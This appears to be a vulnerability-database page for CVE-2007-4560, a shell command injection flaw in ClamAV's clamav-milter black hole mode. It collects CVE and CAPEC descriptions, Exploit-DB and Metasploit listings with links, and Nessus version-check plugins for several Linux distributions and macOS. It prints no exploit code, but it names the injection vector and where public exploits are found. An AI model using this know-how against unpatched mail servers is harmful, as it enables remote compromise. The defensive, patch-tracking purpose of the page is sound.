Vulnerabilities > CVE-2007-4560 - OS Command Injection vulnerability in Clam Anti-Virus Clamav
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Exploit-Db
description ClamAV Milter. CVE-2007-4560. Remote exploits for multiple platform id EDB-ID:9913 last seen 2016-02-01 modified 2007-08-24 published 2007-08-24 reporter patrick source https://www.exploit-db.com/download/9913/ title ClamAV Milter <= 0.92.2 - Blackhole-Mode sendmail Code Execution description ClamAV Milter Blackhole-Mode Remote Code Execution. CVE-2007-4560. Remote exploit for linux platform id EDB-ID:16924 last seen 2016-02-02 modified 2010-10-09 published 2010-10-09 reporter metasploit source https://www.exploit-db.com/download/16924/ title ClamAV Milter Blackhole-Mode Remote Code Execution
Metasploit
| description | This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call. |
| id | MSF:EXPLOIT/UNIX/SMTP/CLAMAV_MILTER_BLACKHOLE |
| last seen | 2020-01-16 |
| modified | 2017-11-08 |
| published | 2008-03-17 |
| references | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560 |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/clamav_milter_blackhole.rb |
| title | ClamAV Milter Blackhole-Mode Remote Code Execution |
Nessus
NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-200709-14.NASL description The remote host is affected by the vulnerability described in GLSA-200709-14 (ClamAV: Multiple vulnerabilities) Nikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to last seen 2020-06-01 modified 2020-06-02 plugin id 26104 published 2007-09-24 reporter This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/26104 title GLSA-200709-14 : ClamAV: Multiple vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 200709-14. # # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(26104); script_version("1.13"); script_cvs_date("Date: 2019/08/02 13:32:44"); script_cve_id("CVE-2007-4510", "CVE-2007-4560"); script_xref(name:"GLSA", value:"200709-14"); script_name(english:"GLSA-200709-14 : ClamAV: Multiple vulnerabilities"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-200709-14 (ClamAV: Multiple vulnerabilities) Nikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to 'popen()' when executing sendmail (CVE-2007-4560). Also, NULL pointer dereference errors exist within the 'cli_scanrtf()' function in libclamav/rtf.c and Stefanos Stamatis discovered a NULL pointer dereference vulnerability within the 'cli_html_normalise()' function in libclamav/htmlnorm.c (CVE-2007-4510). Impact : The unsanitized recipient address can be exploited to execute arbitrary code with the privileges of the clamav-milter process by sending an email with a specially crafted recipient address to the affected system. Also, the NULL pointer dereference errors can be exploited to crash ClamAV. Successful exploitation of the latter vulnerability requires that clamav-milter is started with the 'black hole' mode activated, which is not enabled by default. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/200709-14" ); script_set_attribute( attribute:"solution", value: "All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose '>=app-antivirus/clamav-0.91.2'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack'); script_cwe_id(78); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:clamav"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2007/09/20"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/24"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"app-antivirus/clamav", unaffected:make_list("ge 0.91.2"), vulnerable:make_list("lt 0.91.2"))) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get()); else security_hole(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ClamAV"); }NASL family Fedora Local Security Checks NASL id FEDORA_2007-2050.NASL description - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at informatik.tu-chemnitz.de> - 0.91.2-2 - fixed an open(2) issue - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at informatik.tu-chemnitz.de> - 0.91.2-1 - updated to 0.91.2 (SECURITY) : - CVE-2007-4510 DOS in RTF parser - DOS in html normalizer - arbitrary command execution by special crafted recipients in clamav-milter last seen 2020-06-01 modified 2020-06-02 plugin id 27747 published 2007-11-06 reporter This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/27747 title Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2007-2050. # include("compat.inc"); if (description) { script_id(27747); script_version ("1.14"); script_cvs_date("Date: 2019/08/02 13:32:25"); script_cve_id("CVE-2007-4510", "CVE-2007-4560"); script_bugtraq_id(25398, 25439); script_xref(name:"FEDORA", value:"2007-2050"); script_name(english:"Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: " - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at informatik.tu-chemnitz.de> - 0.91.2-2 - fixed an open(2) issue - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at informatik.tu-chemnitz.de> - 0.91.2-1 - updated to 0.91.2 (SECURITY) : - CVE-2007-4510 DOS in RTF parser - DOS in html normalizer - arbitrary command execution by special crafted recipients in clamav-milter's black-hole mode Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); # https://lists.fedoraproject.org/pipermail/package-announce/2007-September/003629.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?fc903132" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack'); script_cwe_id(78); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-data"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-data-empty"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-filesystem"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-lib"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-milter"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-milter-sysv"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-server-sysv"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:clamav-update"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:7"); script_set_attribute(attribute:"patch_publication_date", value:"2007/09/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/06"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 7.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC7", reference:"clamav-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-data-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-data-empty-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-debuginfo-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-devel-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-filesystem-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-lib-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-milter-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-milter-sysv-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-server-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-server-sysv-0.91.2-2.fc7")) flag++; if (rpm_check(release:"FC7", reference:"clamav-update-0.91.2-2.fc7")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "clamav / clamav-data / clamav-data-empty / clamav-debuginfo / etc"); }NASL family MacOS X Local Security Checks NASL id MACOSX_SECUPD2008-002.NASL description The remote host is running a version of Mac OS X 10.5 or 10.4 that does not have the security update 2008-002 applied. This update contains several security fixes for a number of programs. last seen 2020-06-01 modified 2020-06-02 plugin id 31605 published 2008-03-19 reporter This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/31605 title Mac OS X Multiple Vulnerabilities (Security Update 2008-002) code # # (C) Tenable Network Security, Inc. # if (!defined_func("bn_random")) exit(0); if (NASL_LEVEL < 3004) exit(0); include("compat.inc"); if (description) { script_id(31605); script_version ("1.38"); script_cvs_date("Date: 2018/07/14 1:59:35"); script_cve_id("CVE-2005-3352", "CVE-2005-4077", "CVE-2006-3334", "CVE-2006-3747", "CVE-2006-5793", "CVE-2006-6481", "CVE-2007-0897", "CVE-2007-0898", "CVE-2007-1659", "CVE-2007-1660", "CVE-2007-1661", "CVE-2007-1662", "CVE-2007-1745", "CVE-2007-1997", "CVE-2007-2445", "CVE-2007-2799", "CVE-2007-3378", "CVE-2007-3725", "CVE-2007-3799", "CVE-2007-3847", "CVE-2007-4510", "CVE-2007-4560", "CVE-2007-4568", "CVE-2007-4752", "CVE-2007-4766", "CVE-2007-4767", "CVE-2007-4768", "CVE-2007-4887", "CVE-2007-4990", "CVE-2007-5000", "CVE-2007-5266", "CVE-2007-5267", "CVE-2007-5268", "CVE-2007-5269", "CVE-2007-5795", "CVE-2007-5901", "CVE-2007-5958", "CVE-2007-5971", "CVE-2007-6109", "CVE-2007-6203", "CVE-2007-6335", "CVE-2007-6336", "CVE-2007-6337", "CVE-2007-6388", "CVE-2007-6421", "CVE-2007-6427", "CVE-2007-6428", "CVE-2007-6429", "CVE-2008-0005", "CVE-2008-0006", "CVE-2008-0044", "CVE-2008-0045", "CVE-2008-0046", "CVE-2008-0047", "CVE-2008-0048", "CVE-2008-0049", "CVE-2008-0050", "CVE-2008-0051", "CVE-2008-0052", "CVE-2008-0053", "CVE-2008-0054", "CVE-2008-0055", "CVE-2008-0056", "CVE-2008-0057", "CVE-2008-0058", "CVE-2008-0059", "CVE-2008-0060", "CVE-2008-0062", "CVE-2008-0063", "CVE-2008-0318", "CVE-2008-0596", "CVE-2008-0728", "CVE-2008-0882", "CVE-2008-0987", "CVE-2008-0988", "CVE-2008-0989", "CVE-2008-0990", "CVE-2008-0992", "CVE-2008-0993", "CVE-2008-0994", "CVE-2008-0995", "CVE-2008-0996", "CVE-2008-0997", "CVE-2008-0998", "CVE-2008-0999", "CVE-2008-1000"); script_bugtraq_id(19204, 21078, 24268, 25398, 25439, 25489, 25498, 26346, 26750, 26838, 26927, 26946, 27234, 27236, 27751, 27988, 28278, 28303, 28304, 28307, 28320, 28323, 28334, 28339, 28340, 28341, 28343, 28344, 28345, 28357, 28358, 28359, 28363, 28364, 28365, 28367, 28368, 28371, 28371, 28372, 28374, 28375, 28384, 28385, 28386, 28387, 28388, 28389); script_name(english:"Mac OS X Multiple Vulnerabilities (Security Update 2008-002)"); script_summary(english:"Check for the presence of Security Update 2008-002"); script_set_attribute(attribute:"synopsis", value: "The remote host is missing a Mac OS X update that fixes various security issues." ); script_set_attribute(attribute:"description", value: "The remote host is running a version of Mac OS X 10.5 or 10.4 that does not have the security update 2008-002 applied. This update contains several security fixes for a number of programs." ); script_set_attribute(attribute:"see_also", value:"http://docs.info.apple.com/article.html?artnum=307562" ); script_set_attribute(attribute:"see_also", value:"http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html" ); script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/14242" ); script_set_attribute(attribute:"solution", value: "Install Security Update 2008-002 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(20, 22, 78, 79, 94, 119, 134, 189, 200, 255, 264, 362, 399); script_set_attribute(attribute:"plugin_publication_date", value: "2008/03/19"); script_set_attribute(attribute:"patch_publication_date", value: "2007/08/24"); script_set_attribute(attribute:"vuln_publication_date", value: "2007/06/02"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"MacOS X Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/MacOSX/packages", "Host/uname"); exit(0); } uname = get_kb_item("Host/uname"); if (!uname) exit(0); if (egrep(pattern:"Darwin.* (8\.[0-9]\.|8\.1[01]\.)", string:uname)) { packages = get_kb_item("Host/MacOSX/packages"); if (!packages) exit(0); if (!egrep(pattern:"^SecUpd(Srvr)?(2008-00[2-8]|2009-|20[1-9][0-9]-)", string:packages)) security_hole(0); } else if (egrep(pattern:"Darwin.* (9\.[0-2]\.)", string:uname)) { packages = get_kb_item("Host/MacOSX/packages/boms"); if (!packages) exit(0); if (!egrep(pattern:"^com\.apple\.pkg\.update\.security\.2008\.002\.bom", string:packages)) security_hole(0); }NASL family Mandriva Local Security Checks NASL id MANDRAKE_MDKSA-2007-172.NASL description A vulnerability in ClamAV was discovered that could allow remote attackers to cause a denial of service via a crafted RTF file or a crafted HTML document with a data: URI, both of which trigger a NULL dereference (CVE-2007-4510). A vulnerability in clamav-milter, when run in black hole mode, could allow remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call (CVE-2007-4560). Other bugs have also been corrected in 0.91.2 which is being provided with this update. last seen 2020-06-01 modified 2020-06-02 plugin id 25969 published 2007-09-03 reporter This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/25969 title Mandrake Linux Security Advisory : clamav (MDKSA-2007:172) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Mandrake Linux Security Advisory MDKSA-2007:172. # The text itself is copyright (C) Mandriva S.A. # include("compat.inc"); if (description) { script_id(25969); script_version ("1.18"); script_cvs_date("Date: 2019/08/02 13:32:49"); script_cve_id("CVE-2007-4510", "CVE-2007-4560"); script_bugtraq_id(25398, 25439); script_xref(name:"MDKSA", value:"2007:172"); script_name(english:"Mandrake Linux Security Advisory : clamav (MDKSA-2007:172)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value: "The remote Mandrake Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "A vulnerability in ClamAV was discovered that could allow remote attackers to cause a denial of service via a crafted RTF file or a crafted HTML document with a data: URI, both of which trigger a NULL dereference (CVE-2007-4510). A vulnerability in clamav-milter, when run in black hole mode, could allow remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call (CVE-2007-4560). Other bugs have also been corrected in 0.91.2 which is being provided with this update." ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack'); script_cwe_id(78); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamav"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamav-db"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamav-milter"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamd"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:clamdmon"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64clamav-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64clamav2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libclamav-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libclamav2"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007.1"); script_set_attribute(attribute:"patch_publication_date", value:"2007/08/31"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/03"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Mandriva Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux"); if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu); flag = 0; if (rpm_check(release:"MDK2007.0", reference:"clamav-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"clamav-db-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"clamav-milter-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"clamd-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"clamdmon-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64clamav-devel-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64clamav2-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libclamav-devel-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libclamav2-0.91.2-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", reference:"clamav-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", reference:"clamav-db-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", reference:"clamav-milter-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", reference:"clamd-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", reference:"clamdmon-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", cpu:"x86_64", reference:"lib64clamav-devel-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", cpu:"x86_64", reference:"lib64clamav2-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", cpu:"i386", reference:"libclamav-devel-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.1", cpu:"i386", reference:"libclamav2-0.91.2-1.1mdv2007.1", yank:"mdv")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family Debian Local Security Checks NASL id DEBIAN_DSA-1366.NASL description Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2007-4510 It was discovered that the RTF and RFC2397 parsers can be tricked into dereferencing a NULL pointer, resulting in denial of service. - CVE-2007-4560 It was discovered that clamav-milter performs insufficient input sanitising, resulting in the execution of arbitrary shell commands. The oldstable distribution (sarge) is only affected by a subset of the problems. An update will be provided later. last seen 2020-06-01 modified 2020-06-02 plugin id 25966 published 2007-09-03 reporter This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/25966 title Debian DSA-1366-1 : clamav - several vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-1366. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(25966); script_version("1.20"); script_cvs_date("Date: 2019/08/02 13:32:20"); script_cve_id("CVE-2007-4510", "CVE-2007-4560"); script_xref(name:"DSA", value:"1366"); script_name(english:"Debian DSA-1366-1 : clamav - several vulnerabilities"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2007-4510 It was discovered that the RTF and RFC2397 parsers can be tricked into dereferencing a NULL pointer, resulting in denial of service. - CVE-2007-4560 It was discovered that clamav-milter performs insufficient input sanitising, resulting in the execution of arbitrary shell commands. The oldstable distribution (sarge) is only affected by a subset of the problems. An update will be provided later." ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2007-4510" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2007-4560" ); script_set_attribute( attribute:"see_also", value:"https://www.debian.org/security/2007/dsa-1366" ); script_set_attribute( attribute:"solution", value: "Upgrade the clamav packages. For the stable distribution (etch) these problems have been fixed in version 0.90.1-3etch7." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); 